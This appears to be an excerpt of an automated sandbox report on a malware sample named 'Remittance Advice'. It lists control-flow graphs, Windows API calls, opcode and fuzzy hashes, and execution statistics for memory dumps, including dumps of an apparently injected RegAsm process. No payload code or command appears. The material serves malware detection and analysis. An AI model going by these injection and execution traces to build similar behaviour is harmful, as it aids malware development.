                                                                                          • Source File: 00000000.00000002.1452605846.00000000030E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 030E0000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_30e0000_Remittance Advice.jbxd
                                                                                          Similarity
                                                                                          • API ID: Current$ProcessThread
                                                                                          • String ID:
                                                                                          • API String ID: 2063062207-0
                                                                                          • Opcode ID: a9c9f658771af5c1af347be371b523910afa88ae53952499693a565e2251a07b
                                                                                          • Instruction ID: 0865aceec37ba3090fdd05275e4a0ebdc81fbaac82810bdfff62e431bb0a0b66
                                                                                          • Opcode Fuzzy Hash: a9c9f658771af5c1af347be371b523910afa88ae53952499693a565e2251a07b
                                                                                          • Instruction Fuzzy Hash: F85178B09013098FEB14DFAAD548B9EBBF1EF88314F248459E418A7390DB745945CF65

                                                                                          Control-flow Graph

                                                                                          • Executed
                                                                                          • Not Executed
                                                                                          control_flow_graph 421 30eb298-30eb2b7 422 30eb2b9-30eb2c6 call 30eaf38 421->422 423 30eb2e3-30eb2e7 421->423 429 30eb2dc 422->429 430 30eb2c8 422->430 425 30eb2fb-30eb33c 423->425 426 30eb2e9-30eb2f3 423->426 432 30eb33e-30eb346 425->432 433 30eb349-30eb357 425->433 426->425 429->423 476 30eb2ce call 30eb533 430->476 477 30eb2ce call 30eb540 430->477 432->433 434 30eb37b-30eb37d 433->434 435 30eb359-30eb35e 433->435 440 30eb380-30eb387 434->440 437 30eb369 435->437 438 30eb360-30eb367 call 30eaf44 435->438 436 30eb2d4-30eb2d6 436->429 439 30eb418-30eb4d8 436->439 442 30eb36b-30eb379 437->442 438->442 471 30eb4da-30eb4dd 439->471 472 30eb4e0-30eb50b GetModuleHandleW 439->472 443 30eb389-30eb391 440->443 444 30eb394-30eb39b 440->444 442->440 443->444 447 30eb39d-30eb3a5 444->447 448 30eb3a8-30eb3b1 call 30eaf54 444->448 447->448 452 30eb3be-30eb3c3 448->452 453 30eb3b3-30eb3bb 448->453 454 30eb3c5-30eb3cc 452->454 455 30eb3e1-30eb3ee 452->455 453->452 454->455 457 30eb3ce-30eb3de call 30eaf64 call 30eaf74 454->457 462 30eb3f0-30eb40e 455->462 463 30eb411-30eb417 455->463 457->455 462->463 471->472 473 30eb50d-30eb513 472->473 474 30eb514-30eb528 472->474 473->474 476->436 477->436
                                                                                          APIs
                                                                                          • GetModuleHandleW.KERNELBASE(00000000), ref: 030EB4FE
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1452605846.00000000030E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 030E0000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_30e0000_Remittance Advice.jbxd
                                                                                          Similarity
                                                                                          • API ID: HandleModule
                                                                                          • String ID:
                                                                                          • API String ID: 4139908857-0
                                                                                          • Opcode ID: 56385e1a10f9a1aa0fb50e608c1bd7371903764d54741e7279d8912cb844e857
                                                                                          • Instruction ID: 32cb3ac7466e6bd2ab3a66b0f608cd52440552ce52a0f990c2aec65b3949ae4c
                                                                                          • Opcode Fuzzy Hash: 56385e1a10f9a1aa0fb50e608c1bd7371903764d54741e7279d8912cb844e857
                                                                                          • Instruction Fuzzy Hash: B58155B0A05B058FDB64DF3AD44179ABBF2FF88200F04892ED09ADBA50D775E845CB95

                                                                                          Control-flow Graph

                                                                                          • Executed
                                                                                          • Not Executed
                                                                                          control_flow_graph 478 30e590c-30e590e 479 30e5915 478->479 480 30e5910-30e5912 478->480 481 30e5919-30e59d9 CreateActCtxA 479->481 480->481 482 30e5914 480->482 484 30e59db-30e59e1 481->484 485 30e59e2-30e5a3c 481->485 482->479 484->485 492 30e5a3e-30e5a41 485->492 493 30e5a4b-30e5a4f 485->493 492->493 494 30e5a60 493->494 495 30e5a51-30e5a5d 493->495 497 30e5a61 494->497 495->494 497->497
                                                                                          APIs
                                                                                          • CreateActCtxA.KERNEL32(?), ref: 030E59C9
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1452605846.00000000030E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 030E0000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_30e0000_Remittance Advice.jbxd
                                                                                          Similarity
                                                                                          • API ID: Create
                                                                                          • String ID:
                                                                                          • API String ID: 2289755597-0
                                                                                          • Opcode ID: 6e5b2211dcf558c1b403a17537376012b8099560c39278a2ec701df26974d3dd
                                                                                          • Instruction ID: b06cc1c7a69389bd658ac36046503f3e0ef398391a9fcfee1ed761fc578a8b41
                                                                                          • Opcode Fuzzy Hash: 6e5b2211dcf558c1b403a17537376012b8099560c39278a2ec701df26974d3dd
                                                                                          • Instruction Fuzzy Hash: 36410FB1D01729CFEB24CFA9C8847CDBBB1BF49314F24846AD118AB251DB756946CF90

                                                                                          Control-flow Graph

                                                                                          • Executed
                                                                                          • Not Executed
                                                                                          control_flow_graph 498 30e449c-30e59d9 CreateActCtxA 502 30e59db-30e59e1 498->502 503 30e59e2-30e5a3c 498->503 502->503 510 30e5a3e-30e5a41 503->510 511 30e5a4b-30e5a4f 503->511 510->511 512 30e5a60 511->512 513 30e5a51-30e5a5d 511->513 515 30e5a61 512->515 513->512 515->515
                                                                                          APIs
                                                                                          • CreateActCtxA.KERNEL32(?), ref: 030E59C9
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1452605846.00000000030E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 030E0000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_30e0000_Remittance Advice.jbxd
                                                                                          Similarity
                                                                                          • API ID: Create
                                                                                          • String ID:
                                                                                          • API String ID: 2289755597-0
                                                                                          • Opcode ID: 251bdb82155bf40bd0bb4188f5dd5e442fe709402291f013f229207b28a4f51d
                                                                                          • Instruction ID: 9134ff268f49cf7e9a01ddef087baef6239d6a5ffcc25228cb07f1306e832499
                                                                                          • Opcode Fuzzy Hash: 251bdb82155bf40bd0bb4188f5dd5e442fe709402291f013f229207b28a4f51d
                                                                                          • Instruction Fuzzy Hash: AA41F0B1D01719CFEB24CFA9C88478DBBF1BF49304F24846AD508AB251DBB56946CF90

                                                                                          Control-flow Graph

                                                                                          • Executed
                                                                                          • Not Executed
                                                                                          control_flow_graph 516 75411a8-75411c8 519 7541153 516->519 520 75411ca-75411cb 516->520 521 75420c0-7542102 519->521 520->521 522 7542104-754210c 521->522 523 754210e-754213e EnumThreadWindows 521->523 522->523 524 7542147-7542174 523->524 525 7542140-7542146 523->525 525->524
                                                                                          APIs
                                                                                          • EnumThreadWindows.USER32(?,00000000,060AD49E,?,?,?,00000E20,?,?,075420A0,04234108,0327F3BC), ref: 07542131
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1454048468.0000000007540000.00000040.00000800.00020000.00000000.sdmp, Offset: 07540000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_7540000_Remittance Advice.jbxd
                                                                                          Similarity
                                                                                          • API ID: EnumThreadWindows
                                                                                          • String ID:
                                                                                          • API String ID: 2941952884-0
                                                                                          • Opcode ID: 60b54e90b8648cc6e1a380492e382f65454c73584d6d4d28ddb009821269f4e7
                                                                                          • Instruction ID: ea3fd1ecc85be1f79d077a7118c5f31b22944ba3d5f5d334268157314dd67fde
                                                                                          • Opcode Fuzzy Hash: 60b54e90b8648cc6e1a380492e382f65454c73584d6d4d28ddb009821269f4e7
                                                                                          • Instruction Fuzzy Hash: B4217AB1D002298FDB10DFAAC884BEEBBF4FB48320F14842AD454A7240D774A945CFA5

                                                                                          Control-flow Graph

                                                                                          • Executed
                                                                                          • Not Executed
                                                                                          control_flow_graph 529 7541fc0-7542063 GetCurrentThreadId 533 7542065-754206b 529->533 534 754206c-754209b call 754114c 529->534 533->534 538 75420a0-75420ad 534->538
                                                                                          APIs
                                                                                          • GetCurrentThreadId.KERNEL32 ref: 07542052
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1454048468.0000000007540000.00000040.00000800.00020000.00000000.sdmp, Offset: 07540000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_7540000_Remittance Advice.jbxd
                                                                                          Similarity
                                                                                          • API ID: CurrentThread
                                                                                          • String ID:
                                                                                          • API String ID: 2882836952-0
                                                                                          • Opcode ID: 2c4da24eade3b85fe97bc66cc934cccc14f86c13085c1372c48c6da38cf30441
                                                                                          • Instruction ID: 2e4702848427abd1ea62134dbf59f70928ccef5369a01a86e8094c2d1e728401
                                                                                          • Opcode Fuzzy Hash: 2c4da24eade3b85fe97bc66cc934cccc14f86c13085c1372c48c6da38cf30441
                                                                                          • Instruction Fuzzy Hash: 312163B590025A8FDB10DFA9C885BDEBBF0FB08314F10856AD418AB301C334A845CFA5

                                                                                          Control-flow Graph

                                                                                          • Executed
                                                                                          • Not Executed
                                                                                          control_flow_graph 539 7541fd0-7542063 GetCurrentThreadId 543 7542065-754206b 539->543 544 754206c-754209b call 754114c 539->544 543->544 548 75420a0-75420ad 544->548
                                                                                          APIs
                                                                                          • GetCurrentThreadId.KERNEL32 ref: 07542052
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1454048468.0000000007540000.00000040.00000800.00020000.00000000.sdmp, Offset: 07540000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_7540000_Remittance Advice.jbxd
                                                                                          Similarity
                                                                                          • API ID: CurrentThread
                                                                                          • String ID:
                                                                                          • API String ID: 2882836952-0
                                                                                          • Opcode ID: a8ad4a78bc14c963cacfcaf22a1d3019e476b4422693dc22b1ec0afcb4d61968
                                                                                          • Instruction ID: f11677b91a9997f887f8d9112501a0d4c3a5c4ff15e669bcc4eae701811a9c33
                                                                                          • Opcode Fuzzy Hash: a8ad4a78bc14c963cacfcaf22a1d3019e476b4422693dc22b1ec0afcb4d61968
                                                                                          • Instruction Fuzzy Hash: D72133B490025A8FDB10DFAAC884BDEFBF5FB48314F108569D418AB311D774A945CFA5

                                                                                          Control-flow Graph

                                                                                          • Executed
                                                                                          • Not Executed
                                                                                          control_flow_graph 549 30ed788-30ed81c DuplicateHandle 550 30ed81e-30ed824 549->550 551 30ed825-30ed842 549->551 550->551
                                                                                          APIs
                                                                                          • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 030ED80F
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1452605846.00000000030E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 030E0000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_30e0000_Remittance Advice.jbxd
                                                                                          Similarity
                                                                                          • API ID: DuplicateHandle
                                                                                          • String ID:
                                                                                          • API String ID: 3793708945-0
                                                                                          • Opcode ID: 2c1efac7f4d85808d3f4814affd26f0facc329df4b3a19a60127927a85a117df
                                                                                          • Instruction ID: 7bd95bcc48929b93b0aecdb958ccd3465b7a48a6092647070ac8296aae4417f5
                                                                                          • Opcode Fuzzy Hash: 2c1efac7f4d85808d3f4814affd26f0facc329df4b3a19a60127927a85a117df
                                                                                          • Instruction Fuzzy Hash: C221E4B5D012089FDB10CF9AD984ADEFBF4FB48320F14801AE918A3350D374A945CFA0

                                                                                          Control-flow Graph

                                                                                          • Executed
                                                                                          • Not Executed
                                                                                          control_flow_graph 554 754114c-7542102 557 7542104-754210c 554->557 558 754210e-754213e EnumThreadWindows 554->558 557->558 559 7542147-7542174 558->559 560 7542140-7542146 558->560 560->559
                                                                                          APIs
                                                                                          • EnumThreadWindows.USER32(?,00000000,060AD49E,?,?,?,00000E20,?,?,075420A0,04234108,0327F3BC), ref: 07542131
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1454048468.0000000007540000.00000040.00000800.00020000.00000000.sdmp, Offset: 07540000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_7540000_Remittance Advice.jbxd
                                                                                          Similarity
                                                                                          • API ID: EnumThreadWindows
                                                                                          • String ID:
                                                                                          • API String ID: 2941952884-0
                                                                                          • Opcode ID: e276055a1dffd97afa789bf7fcb0d17fb5638a577691848cdfab5f2c96c9aa1a
                                                                                          • Instruction ID: e988ea910fb2aefe8ed8969e3b2406fbacc2962d6fefb6313b39268278a42969
                                                                                          • Opcode Fuzzy Hash: e276055a1dffd97afa789bf7fcb0d17fb5638a577691848cdfab5f2c96c9aa1a
                                                                                          • Instruction Fuzzy Hash: AE213BB1D002198FDB14DF9AC844BEEFBF5FB88310F14842AE518A3650D774A945CFA5
                                                                                          APIs
                                                                                          • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 030ED80F
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1452605846.00000000030E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 030E0000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_30e0000_Remittance Advice.jbxd
                                                                                          Similarity
                                                                                          • API ID: DuplicateHandle
                                                                                          • String ID:
                                                                                          • API String ID: 3793708945-0
                                                                                          • Opcode ID: 06c580fe5947a4b636a7b63a2dac01e8844c9375b341a1885c354316b9375196
                                                                                          • Instruction ID: 0a7c29c3c5dabe2348414fe762d324322e3eef6b234787bddef9f679d9c6ef37
                                                                                          • Opcode Fuzzy Hash: 06c580fe5947a4b636a7b63a2dac01e8844c9375b341a1885c354316b9375196
                                                                                          • Instruction Fuzzy Hash: 3D21E4B5D013089FDB10CFA9D585ADEBBF4FB48320F14842AE918A3350D378A945CFA1
                                                                                          APIs
                                                                                          • EnumThreadWindows.USER32(?,00000000,060AD49E,?,?,?,00000E20,?,?,075420A0,04234108,0327F3BC), ref: 07542131
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1454048468.0000000007540000.00000040.00000800.00020000.00000000.sdmp, Offset: 07540000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_7540000_Remittance Advice.jbxd
                                                                                          Similarity
                                                                                          • API ID: EnumThreadWindows
                                                                                          • String ID:
                                                                                          • API String ID: 2941952884-0
                                                                                          • Opcode ID: 089b3af11548635bddb67c999b18db052227fb996a3ef03cb0b9eff0f59fd8b0
                                                                                          • Instruction ID: 5f8323a419128a1cec06295af1186fcc65cf49911d5f21a2cc2364754ecda12f
                                                                                          • Opcode Fuzzy Hash: 089b3af11548635bddb67c999b18db052227fb996a3ef03cb0b9eff0f59fd8b0
                                                                                          • Instruction Fuzzy Hash: 9E2129B1D002198FDB14DF9AC844BEEFBF5FB88320F14842AD558A3650D778A945CFA5
                                                                                          APIs
                                                                                          • GetModuleHandleW.KERNELBASE(00000000), ref: 030EB4FE
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1452605846.00000000030E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 030E0000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_30e0000_Remittance Advice.jbxd
                                                                                          Similarity
                                                                                          • API ID: HandleModule
                                                                                          • String ID:
                                                                                          • API String ID: 4139908857-0
                                                                                          • Opcode ID: 8275726d40c59e1da6558973a9a5206a0c69e9e3a1084a7558147cf76cf7692f
                                                                                          • Instruction ID: a32e593e777ad1a65624cd301521295aa85bdaddee376c2361b20bc6d7104abb
                                                                                          • Opcode Fuzzy Hash: 8275726d40c59e1da6558973a9a5206a0c69e9e3a1084a7558147cf76cf7692f
                                                                                          • Instruction Fuzzy Hash: 47110FB6D003498FCB20DF9AC444B9EFBF4EB88324F14842AD428A7610D379A545CFA1
                                                                                          APIs
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1454048468.0000000007540000.00000040.00000800.00020000.00000000.sdmp, Offset: 07540000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_7540000_Remittance Advice.jbxd
                                                                                          Similarity
                                                                                          • API ID: Initialize
                                                                                          • String ID:
                                                                                          • API String ID: 2538663250-0
                                                                                          • Opcode ID: c3d6949442aff8bdc7fffe617d3ddec532528ff80cdea6be0b16b42ee08fb3a5
                                                                                          • Instruction ID: 02dd23eaf2fa353dc6b82789118b468dcb650c41b87f5251b840031ffa0f53c2
                                                                                          • Opcode Fuzzy Hash: c3d6949442aff8bdc7fffe617d3ddec532528ff80cdea6be0b16b42ee08fb3a5
                                                                                          • Instruction Fuzzy Hash: 1F1112B5C003498FDB20DFAAC485BDEBBF4EB48324F20881AD558A3300D779A945CFA5
                                                                                          APIs
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1454048468.0000000007540000.00000040.00000800.00020000.00000000.sdmp, Offset: 07540000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_7540000_Remittance Advice.jbxd
                                                                                          Similarity
                                                                                          • API ID: Initialize
                                                                                          • String ID:
                                                                                          • API String ID: 2538663250-0
                                                                                          • Opcode ID: 0b44b6a013bcb478362f94304003d60da3e3eb7d0541f7a75fc2ef92b84ea423
                                                                                          • Instruction ID: e95f141b0f6f2c107de4b67524879c6cc3260fb0c66e81c86c49896838673697
                                                                                          • Opcode Fuzzy Hash: 0b44b6a013bcb478362f94304003d60da3e3eb7d0541f7a75fc2ef92b84ea423
                                                                                          • Instruction Fuzzy Hash: E11120B5C003498FCB20DFAAC485BDEFBF8EB48324F20841AD518A3200D779A944CFA5
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1452074881.00000000016AD000.00000040.00000800.00020000.00000000.sdmp, Offset: 016AD000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_16ad000_Remittance Advice.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: 0a31852d1d58d872569ed25576413182df40492277f61067f18564877960faec
                                                                                          • Instruction ID: 1ad4d346a11c8df55114807f4dd884eb0257c59393909fa7b17ec3e3df2831a0
                                                                                          • Opcode Fuzzy Hash: 0a31852d1d58d872569ed25576413182df40492277f61067f18564877960faec
                                                                                          • Instruction Fuzzy Hash: A6210071684200DFDB15DF64D984B16BBA1EB88314F60C56DD84A4B786C336D847CE62
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1452074881.00000000016AD000.00000040.00000800.00020000.00000000.sdmp, Offset: 016AD000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_16ad000_Remittance Advice.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: c9685453b121f7c5a95ddacb3af40da0ec74c611a331676ce11f548b2f69f8d7
                                                                                          • Instruction ID: 2151be4b83814f0fe147a66a10a4fb9e2a77d5d8280251ccb9126f55957f2aec
                                                                                          • Opcode Fuzzy Hash: c9685453b121f7c5a95ddacb3af40da0ec74c611a331676ce11f548b2f69f8d7
                                                                                          • Instruction Fuzzy Hash: B52192755483809FCB03CF54D994B11BF71EB46314F28C5DAD8498F6A7C33A9846CB62
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1452605846.00000000030E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 030E0000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_30e0000_Remittance Advice.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: 4325fba985061fb62dab4496305144bd1efd70dda44e810f7bc13b3436be296e
                                                                                          • Instruction ID: ec65c7656ef61f966e13dd9a814810909fed00b03fe535dd7cd47bdb1bb9c313
                                                                                          • Opcode Fuzzy Hash: 4325fba985061fb62dab4496305144bd1efd70dda44e810f7bc13b3436be296e
                                                                                          • Instruction Fuzzy Hash: A3A16D36F0121A8FCF09DFB4C9445DEB7B2FF84300B1985AAE805AB265DB31E955CB40

                                                                                          Execution Graph

                                                                                          Execution Coverage:16%
                                                                                          Dynamic/Decrypted Code Coverage:100%
                                                                                          Signature Coverage:27.5%
                                                                                          Total number of Nodes:40
                                                                                          Total number of Limit Nodes:6
                                                                                          execution_graph 9049 9eca58 9050 9eca4e 9049->9050 9052 9eca65 9049->9052 9050->9049 9050->9052 9054 9ecde6 9050->9054 9055 9ec168 9050->9055 9053 9ec168 LdrInitializeThunk 9053->9054 9054->9052 9054->9053 9056 9ec17a 9055->9056 9058 9ec17f 9055->9058 9056->9054 9057 9ec8a9 LdrInitializeThunk 9057->9056 9058->9056 9058->9057 9059 9e46d8 9060 9e46e4 9059->9060 9063 9e48c9 9060->9063 9064 9e48e4 9063->9064 9068 9e4ef8 9064->9068 9075 9e4f08 9064->9075 9065 9e4713 9069 9e4f2a 9068->9069 9070 9e4ff6 9069->9070 9073 9ec168 LdrInitializeThunk 9069->9073 9082 9ec158 9069->9082 9088 9ec76c 9069->9088 9094 9ec387 9069->9094 9070->9065 9073->9070 9076 9e4f2a 9075->9076 9077 9e4ff6 9076->9077 9078 9ec76c 2 API calls 9076->9078 9079 9ec158 2 API calls 9076->9079 9080 9ec168 LdrInitializeThunk 9076->9080 9081 9ec387 2 API calls 9076->9081 9077->9065 9078->9077 9079->9077 9080->9077 9081->9077 9083 9ec17f 9082->9083 9084 9ec17a 9082->9084 9083->9084 9085 9ec764 LdrInitializeThunk 9083->9085 9087 9ec168 LdrInitializeThunk 9083->9087 9084->9070 9085->9084 9087->9083 9089 9ec623 9088->9089 9090 9ec764 LdrInitializeThunk 9089->9090 9093 9ec168 LdrInitializeThunk 9089->9093 9092 9ec8c1 9090->9092 9092->9070 9093->9089 9098 9ec3b9 9094->9098 9095 9ec519 9095->9070 9096 9ec764 LdrInitializeThunk 9096->9095 9098->9095 9098->9096 9099 9ec168 LdrInitializeThunk 9098->9099 9099->9098

                                                                                          Control-flow Graph

                                                                                          • Executed
                                                                                          • Not Executed
                                                                                          control_flow_graph 1509 9ec168-9ec178 1510 9ec17f-9ec18b 1509->1510 1511 9ec17a 1509->1511 1514 9ec18d 1510->1514 1515 9ec192-9ec1a7 1510->1515 1512 9ec2ab-9ec2b5 1511->1512 1514->1512 1518 9ec1ad-9ec1b8 1515->1518 1519 9ec2bb-9ec2fb call 9e5d08 1515->1519 1522 9ec1be-9ec1c5 1518->1522 1523 9ec2b6 1518->1523 1537 9ec302-9ec378 call 9e5d08 call 9e5c00 1519->1537 1524 9ec1c7-9ec1de 1522->1524 1525 9ec1f2-9ec1fd 1522->1525 1523->1519 1536 9ec1e4-9ec1e7 1524->1536 1524->1537 1530 9ec1ff-9ec207 1525->1530 1531 9ec20a-9ec214 1525->1531 1530->1531 1539 9ec29e-9ec2a3 1531->1539 1540 9ec21a-9ec224 1531->1540 1536->1523 1541 9ec1ed-9ec1f0 1536->1541 1569 9ec3df-9ec454 call 9e5ca8 1537->1569 1570 9ec37a-9ec385 1537->1570 1539->1512 1540->1523 1547 9ec22a-9ec246 1540->1547 1541->1524 1541->1525 1552 9ec24a-9ec24d 1547->1552 1553 9ec248 1547->1553 1554 9ec24f-9ec252 1552->1554 1555 9ec254-9ec257 1552->1555 1553->1512 1557 9ec25a-9ec268 1554->1557 1555->1557 1557->1523 1563 9ec26a-9ec271 1557->1563 1563->1512 1564 9ec273-9ec279 1563->1564 1564->1523 1566 9ec27b-9ec280 1564->1566 1566->1523 1567 9ec282-9ec295 1566->1567 1567->1523 1573 9ec297-9ec29a 1567->1573 1576 9ec4f3-9ec4f9 1569->1576 1573->1564 1575 9ec29c 1573->1575 1575->1512 1577 9ec4ff-9ec517 1576->1577 1578 9ec459-9ec46c 1576->1578 1579 9ec52b-9ec53e 1577->1579 1580 9ec519-9ec526 1577->1580 1581 9ec46e 1578->1581 1582 9ec473-9ec4c4 1578->1582 1584 9ec545-9ec561 1579->1584 1585 9ec540 1579->1585 1583 9ec8c1-9ec9bf 1580->1583 1581->1582 1599 9ec4c6-9ec4d4 1582->1599 1600 9ec4d7-9ec4e9 1582->1600 1590 9ec9c7-9ec9d1 1583->1590 1591 9ec9c1-9ec9c6 call 9e5ca8 1583->1591 1586 9ec568-9ec58c 1584->1586 1587 9ec563 1584->1587 1585->1584 1595 9ec58e 1586->1595 1596 9ec593-9ec5c5 1586->1596 1587->1586 1591->1590 1595->1596 1605 9ec5cc-9ec60e 1596->1605 1606 9ec5c7 1596->1606 1599->1577 1602 9ec4eb 1600->1602 1603 9ec4f0 1600->1603 1602->1603 1603->1576 1608 9ec615-9ec61e 1605->1608 1609 9ec610 1605->1609 1606->1605 1610 9ec846-9ec84c 1608->1610 1609->1608 1611 9ec852-9ec865 1610->1611 1612 9ec623-9ec648 1610->1612 1615 9ec86c-9ec887 1611->1615 1616 9ec867 1611->1616 1613 9ec64f-9ec686 1612->1613 1614 9ec64a 1612->1614 1624 9ec68d-9ec6bf 1613->1624 1625 9ec688 1613->1625 1614->1613 1617 9ec88e-9ec8a2 1615->1617 1618 9ec889 1615->1618 1616->1615 1622 9ec8a9-9ec8bf LdrInitializeThunk 1617->1622 1623 9ec8a4 1617->1623 1618->1617 1622->1583 1623->1622 1627 9ec723-9ec736 1624->1627 1628 9ec6c1-9ec6e6 1624->1628 1625->1624 1631 9ec73d-9ec762 1627->1631 1632 9ec738 1627->1632 1629 9ec6ed-9ec71b 1628->1629 1630 9ec6e8 1628->1630 1629->1627 1630->1629 1635 9ec764-9ec765 1631->1635 1636 9ec771-9ec7a9 1631->1636 1632->1631 1635->1611 1637 9ec7ab 1636->1637 1638 9ec7b0-9ec811 call 9ec168 1636->1638 1637->1638 1644 9ec818-9ec83c 1638->1644 1645 9ec813 1638->1645 1648 9ec83e 1644->1648 1649 9ec843 1644->1649 1645->1644 1648->1649 1649->1610
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000003.00000002.3925313781.00000000009E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 009E0000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_3_2_9e0000_RegAsm.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: 0d410c9341f72570a255d505eb3058ef159d02dd5eba9347f909703ee31b8067
                                                                                          • Instruction ID: bb12b363b1e6629c0c0b42e4579ccf090a00b5a35f78883fc49d32c596060ab6
                                                                                          • Opcode Fuzzy Hash: 0d410c9341f72570a255d505eb3058ef159d02dd5eba9347f909703ee31b8067
                                                                                          • Instruction Fuzzy Hash: 8F224BB4E00259CFDB15DFA9C884B9DBBB2BF88304F1081A9D459AB391DB359D86CF50

                                                                                          Control-flow Graph

                                                                                          • Executed
                                                                                          • Not Executed
                                                                                          control_flow_graph 1903 9e4f08-9e4f28 1904 9e4f2f-9e4fc0 1903->1904 1905 9e4f2a 1903->1905 1909 9e4fc6-9e4fd6 1904->1909 1910 9e5314-9e5348 1904->1910 1905->1904 1963 9e4fd9 call 9e56af 1909->1963 1964 9e4fd9 call 9e5367 1909->1964 1913 9e4fdf-9e4fee 1959 9e4ff0 call 9ec76c 1913->1959 1960 9e4ff0 call 9ec158 1913->1960 1961 9e4ff0 call 9ec168 1913->1961 1962 9e4ff0 call 9ec387 1913->1962 1914 9e4ff6-9e5012 1916 9e5019-9e5022 1914->1916 1917 9e5014 1914->1917 1918 9e5307-9e530d 1916->1918 1917->1916 1919 9e5027-9e50a1 1918->1919 1920 9e5313 1918->1920 1925 9e515d-9e51b8 1919->1925 1926 9e50a7-9e5115 call 9e3760 1919->1926 1920->1910 1938 9e51b9-9e5209 1925->1938 1936 9e5158-9e515b 1926->1936 1937 9e5117-9e5157 1926->1937 1936->1938 1937->1936 1943 9e520f-9e52f1 1938->1943 1944 9e52f2-9e52fd 1938->1944 1943->1944 1945 9e52ff 1944->1945 1946 9e5304 1944->1946 1945->1946 1946->1918 1959->1914 1960->1914 1961->1914 1962->1914 1963->1913 1964->1913
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000003.00000002.3925313781.00000000009E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 009E0000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_3_2_9e0000_RegAsm.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: f4297c62d6529435b72dc75a28ce97f49e36bb91de97852dd1c27a4d8815bb5f
                                                                                          • Instruction ID: 2d5e9edcad1d3c3c0cb784e7ccc7eb919ba27f90856ecbf38de09aa248dfbf64
                                                                                          • Opcode Fuzzy Hash: f4297c62d6529435b72dc75a28ce97f49e36bb91de97852dd1c27a4d8815bb5f
                                                                                          • Instruction Fuzzy Hash: 84C19174E00218CFDB55DFA5D944B9DBBB2FB88301F2080A9E809A7355EB359E86DF50
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000003.00000002.3925313781.00000000009E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 009E0000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_3_2_9e0000_RegAsm.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
